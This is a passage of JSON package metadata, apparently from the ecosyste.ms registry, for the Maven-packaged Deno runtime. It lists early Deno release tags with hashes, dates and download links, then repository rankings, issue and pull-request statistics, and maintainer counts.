5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-22T23:11:15.287Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":29.64704261927198,"dependent_packages_count":42.38355423497933,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":36.01529842712566},"purl":"pkg:maven/org.mvnpm/deno","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/maven/org.mvnpm:deno","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/maven/org.mvnpm:deno","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/maven/org.mvnpm:deno/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-22T15:36:05.774Z","issues_count":6593,"pull_requests_count":9606,"avg_time_to_close_issue":17240482.91906903,"avg_time_to_close_pull_request":1537756.603103103,"issues_closed_count":3779,"pull_requests_closed_count":7991,"pull_request_authors_count":571,"issue_authors_count":2462,"avg_comments_per_issue":2.5116032155316246,"avg_comments_per_pull_request":0.7158026233603998,"merged_pull_requests_count":6976,"bot_issues_count":0,"bot_pull_requests_count":47,"past_year_issues_count":659,"past_year_pull_requests_count":1189,"past_year_avg_time_to_close_issue":1375932.5787037036,"past_year_avg_time_to_close_pull_request":1325136.485893417,"past_year_issues_closed_count":216,"past_year_pull_requests_closed_count":638,"past_year_pull_request_authors_count":177,"past_year_issue_authors_count":370,"past_year_avg_comments_per_issue":1.2109256449165402,"past_year_avg_comments_per_pull_request":1.07905803195963,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":16,"past_year_merged_pull_requests_count":468,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1779,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":673,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":288,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":281,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/